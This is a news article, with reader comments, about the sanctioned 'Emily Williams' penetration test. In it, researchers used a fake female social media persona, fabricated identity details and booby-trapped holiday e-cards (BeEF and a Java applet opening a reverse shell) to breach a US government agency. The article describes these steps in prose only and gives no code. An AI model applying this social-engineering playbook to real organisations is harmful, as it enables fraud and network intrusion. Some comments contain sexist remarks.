Government agency compromised by fake Facebook hottie

Government agency compromised by fake Facebook hottie

Summary: Emily Williams wasn't real, but the two hackers who created her from social media profiles got her a government job, a company laptop, VPN credentials - and compromised a government network.

SHARE:

Using social media profiles and a photo of a real (and consenting) woman, two hackers fooled a government employer into believing she was an employee, conning them out of a company laptop, network credentials, and more.

They used "her" Facebook and LinkedIn connections to send out holiday cards linked to an attack site, which the government employees visited, and scammed one employee into sending her a work laptop - as well as network access credentials and more, such as SalesForce logins.

Robin Sage Emily Williams

The researchers used the imaginary pretty girl's poisoned holiday e-cards to gain administrative rights, obtain passwords, install applications and stole documents with sensitive information - some of which, according to the hackers, included information about state-sponsored attacks and country leaders.

Miss Emily Williams - run by puppetmasters security researchers Aamir Lakhani and Joseph Muniz - even convinced a security team executive to click a javascript exploit masquerading as a birthday card, thus compromising his laptop.

Lakhani told an audience at RSA Europe 2013 on Wednesday, October 30, "This guy had access to everything. He had the crown jewels in the system." 

Mr. Lakhani presented the team's research findings at RSA Europe in a talk titled Social Media Deception, the results of his team's sanctioned 90-day "Emily Williams" penetration test experiment on a US government agency, conducted at the end of 2012.

Lakhani declined to state which U.S. government agency was infiltrated and compromised by the fictitious Miss Williams. He told the RSA audience that his team's pre-Snowden attack was performed on a very secure agency that specializes in offensive cybersecurity and protecting secrets, one where previously only zero-day attacks had been successful in pentests leveraged against the unnamed agency.

Mr. Lakhani explained that his team had tried the attack with fictitious male characters, but as men they were not successful.

He said that in actuality, through the Emily Williams platform, the team had achieved their objective within a week of deployment but that they ran their experiment for its full 90 days to see how far it could go.

And it went pretty far.

NOTE: The research presented is real. Many people reading this are friends with Emily and probably mad at us.

We have informed anybody attacked so if you haven’t heard from us, you are just social network friends with Emily. -The Social Media Deception Project : How We Created Emily Williams To Compromise Our Target

Emily Williams - the attack - was based on Robin Sage, another fictitious person created in 2009 as a demonstration in the ease of obtaining information from intelligence on US military personnel via social networks; the successful Robin Sage findings were presented at Black Hat 2010 ("Getting in bed with Robin Sage"), to the anger and embarrasment of many.

Hey guys, my face is up here

Miss Williams first came into being on Facebook and LinkedIn sometime during 2011. 

The waitress who volunteered the fictitious character's photos worked at an establishment frequented by the target company's employees - the nearby Hooters - yet no employee recognized her in person at any time during the experiment.

Emily Williams hack

 

We found a non technical female employee from the restaurant industry (that happened to be a few blocks from our target) to volunteer pictures for Emily’s appearance.

We developed a fake social security number, residence and other areas that may be searched to make Emily seem real. We gave Emily an IT background from the University of Texas and updated her profile with a matching employment background.

Before zeroing in on the government target's employees, Lakhani and Muniz built up Miss Williams' presence on social media, netting her hundreds of connections, with only one man flagging her as suspicious.

Another man asked how Emily might know him, and when the researchers answered with information they obtained in the man's profile, he said he did indeed remember the imaginary girl.

Emily Williams

 

Once Wiliams had friends, the hackers updated her Facebook and LinkedIn profiles with just-hired status at the government target, and gave her an engineering title. The attractive, imaginary young woman connected with the target's employees via social media and connected with Human Resources, IT Support, Engineering and those in executive leadership roles.

The congratulations for "her" new job rolled in.

As our target audience friend number grew, we started moving up the rank eventually capturing people from Human Resources and Engineering who would be responsible for hiring Emily if she existed.

We moved all the way up to executive leadership...

As it was near the holidays, no one questioned when Miss Williams posted seasonal cards to Facebook directed at specific targets among her coworkers - which they clicked, and then were seamlessly, unknowingly pwned.

The cards, of course, were part of the hackers' deception. 

The security researchers said that they were intent on doing no harm to their targets.

They had many options for obtaining network access to host systems through social media. One popular one they declined to use is Blackhole, which delivers a malicious payload - but the researchers pointed out they "felt [Blackhole] wasn’t safe for our target’s systems."

Instead they used The Browser Exploitation Framework (BeEF), they said, "based on our feeling that compromising browsers was not as evil as using malware." Via the holiday card ruse, targets clicked to execute a signed Java applet that opened a reverse shell back to Lakhani and Muniz via an SSL connection.

Once we hooked the target, we would look for passwords and insider information to gain access to the target agency. We launched three campaigns targeting systems during Thanksgiving, Christmas and New Years.

We were able to figure out domain credentials to create an inside email address for Emily Williams, VPN passwords to gain internal access and other methods to compromise our target.

Lakhani told the RSA audience that government contractors also fell for their creation's tainted holiday treats, including employees for antivirus companies.

All the while, the team's social engineering continued.

Men working for the government agency gave the pretty girl special treatment. Some men offered to help Miss Williams at her new job by doing her a few favors; namely circumventing usual channels to get her a work laptop, and access to the organization's network.

Deception Emily Williams

 

Lakhani told RSA attendees that the level of access their Pygmalion obtained was higher than what a new hire would have gotten if "she" had gone through the proper channels.

Lakhani and Muniz may have angered a number of government employees, but the pair had so much success they began to receive requests from other companies and organizations to try the same test.

In the RSA Deception talk this week Lakhani said, "So we also did the same type of penetration test for very large financial institutions like banks and credit card companies, healthcare organizations and other firms, and the results were almost exactly the same."

Social Engineering Emily Williams

 

Lakhani cautioned RSA Europe attendees, "Every time we include social engineering in our penetration tests we have a hundred percent success rate."

The talk concluded with a number of recommendations for companies to follow if they want to avoid falling victim to an Emily Williams attack. Some of these are detailed in the team's post, How To Educate Your Employees About Social Engineering.

But, he opined, social engineering trainings aren't ever going to be enough if employees don't have an understanding of constant situational awareness.

Topics: Security, Government US, Malware

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

19 comments
Log in or register to join the discussion
  • hehehe

    Man's greatest weakness in any age
    ArcaneAce
    • mans greatest...

      ... is man himself.

      Sorry, you seem to have forgotten to conclude that sentence you started. :)
      TG2
  • I think having more women...

    ...in these businesses might be good, as women are not generally inclined to give other beautiful women preferential treatment
    nessrapp
    • Wow

      U R an idiot
      Panwo1@...
    • Legend has it ..

      .. during the cold war, the US sent beautiful women to the USSR to seduce politicians and scientists, in order to learn their secrets. The USSR on the other hand, sent handsome men to the US to seduce the secretaries and research assistants, which turned out to be orders of magnitude more successful.
      px43
  • Honeytrap

    A new twist on an old spy trick. And using nothing more than a picture of a pretty woman. It's a sad state of affairs for us men.
    MajorlyCool
    • Plus the "Biologic imperetive

      It is said (usually by women) that many (most?) men -- ages about 15 to about the 30s -- have an undiagnosed case of what I call "reflex hypotensive priapism."

      This differs from "hypotensive syncope" in that, with the latter, you stand up suddenly, the blood rushes out of your brain and you faint. Whereas with hypotensive priapism, the blood rushes out of your head and is directed into the penis, which makes that organ snap to attention while the brain floods with testerone and the "Biological imperative" kicks in.

      Any questions? ;)
      RangerJimK
  • Would it work from foreigners?

    Considering that it is SOCIAL engineering, I'd be curious to know whether the techniques would work if the persons attempting it were foreigners outside the U.S. even if they had attended college in the U.S.

    For instance, we all know there are certain tipoffs to Nigerian 419 scams such as all caps in the subject line and the sender is "Mr. [whoever]" or "Mrs. [whoever]"

    I'm reminded of the Brad Pitt film Inglorious B*st*rds where a group infiltrates Nazi Germany and they have one guy who speaks fluent German he learned from his parents and a Nazi officer is suspicious but not sure until that person orders "Three beers" and holds up his index, middle and ring fingers whereas Germans would hold up their thumb, index and middle fingers.
    Rick_R
  • "Emily ... a 28-year-old MIT graduate with 10 years experience"

    http://www.pcworld.com/article/2059940/fake-social-media-id-duped-securityaware-it-guys.html

    One wonders if that experience included working as a waitress (pun intended)?

    At some point, one would think that 'Emily' would have been referred to Human Resources where a validation and background check would have been arranged. Or has social media made HR obsolete?

    P.S. Ms. Blue, I'm shocked and saddened that they did not ask to use one of your pics. :(
    Rabid Howler Monkey
    • The function of HR

      has always been to protect the decision makers from the hordes of undesirables so they can make their decisions arbitrarily and unilaterally.
      Kurt Engelhart
  • Clean systems

    " even convinced a security team executive to click a javascript exploit masquerading as a birthday card, thus compromising his laptop."

    I don't understand why critical functions, be they master passwords or critical industrial system controls, are not running on non-consumer hardware on an spartan non-consumer OS; and for that matter, not relying on the consumer Internet as a resource. No system is impenetrable, but using "secure" equipment to befriend unknown folks on Facebook seems like a parody.

    "Beware of pretty faces that you find..."
    guiduk
  • Now that computers are ever faster

    Now that computers are ever faster, more powerful, etc.. I would expect more sandboxing to occur for security sake.

    "want to facebook? only use *this* resource for facebook" ... abstinence has never worked. Understanding this, and making a way for people to more easily express themselves, while keeping a better measure of security, needs to be the goal.
    TG2
  • Emily a Hacker's Dream ?

    Why can't she now be used for something more useful to American Citizens who are continuously spied upon by the NSA by the growing nose of Obama ! We need another Mata Hari like a fictional Emily to expose all lies or half explained Fascist truths that are replacing our much loved Democracy with double speak and fooling our citizens, and the intelligence of the Media who has a responsibility to report information to citizens to whom are being misled and may be harmed. Their duty is to report FACTS ! No Bias with no playoffs or favoritism. The press should honor the citizens especially in times of a government that is not following our best interests and have selfish GREED to be exposed as well as crime and cover ups . We also need the groups like Anonymous and other patrolling free speech and honorable hackers to help protect Inalienable rights belonging to every human.This Emily could help us find loop holes everywhere and expose corruption anonymously with documented proof through the World Press.
    ApheliaDawn
  • Other Lessons

    We often hear that young women do not pursue careers in IT because of discouragement by men, creation of a hostile environment, and so on. That is not entirely true, as this exercise shows.
    kjn9
  • Paranoia

    As an IT business owner, I regularly find myself accused of being "paranoid" by friends and family. When I suggest that something like this - 3**xWrx78-39yU - should be a normal password (in a password manager), I start getting sarcastic comments and lighthearted ribbing. When I attempt to teach clients (SMBs) about security best practices, the normal reaction is "eyes glazed over". Even my own employees, whom I can supposedly tell to do things right, give me pushback. (In their defense, they usually improve once they fully understand the reasoning.) All this, however, illustrates the virtual impossibility of training the normal workforce to become "situationally aware" enough to repel a well-done social engineering hack. Heck... I'm a guy, and I know about this stuff!... (follow me?)

    The answer is incentives. For instance, put a "security bounty" on every employee's head. Give them a bonus, which they get to keep at the end of the year PROVIDED they haven't been pwned. Tell them that actual hackers, using social engineering, will be trying to take their bonus... and that the hackers will get the bonus (and the employee won't) if they succeed. Train the employees, let them practice repelling attacks, etc. - give them the tools they need. If this sounds too adversarial, remind everyone that the internet ... is adversarial!

    Out in the "real" real world (the jungle), there is a price to be paid for lazy, uninformed inattention. It's called - death. "Hacked" isn't "killed", but hacking can lead to killing, whether financial or literal. Nevertheless, the jungle is full of life, and situational/security awareness, even to social engineering attacks, can be developed. It's just hard work.
    ClearCreek
  • Wow

    "90-day 'Emily Williams' penetration test"

    I've conducted a few of those sorts of tests myself. With varying success.
    SgtSpork
  • its a male thing...

    When Ms Emily used the words 'zip file' all the guys thought she meant something else..
    ImWatchingToo
  • "Wetware"

    As far as social engineering is concerned, you'll never do better than to exploit sexual-attraction to the opposite sex - it's hard-coded into human DNA.
    anthonymaw
  • People are people...

    ... and as such, often stupid. Maybe I should just say gullible. I won't open "greeting cards" even when they claim to be from my sister, who loves to send greeting cards. I think she finds this annoying. But better safe than sorry.

    Now, if "Emily" came to me in person, I'd probably fall for whatever scam she was running, but when an email comes (typically through a dating site) with a picture of a beautiful woman, I KNOW it's a scam, because beautiful women are not looking for guys like me.
    daniel1948x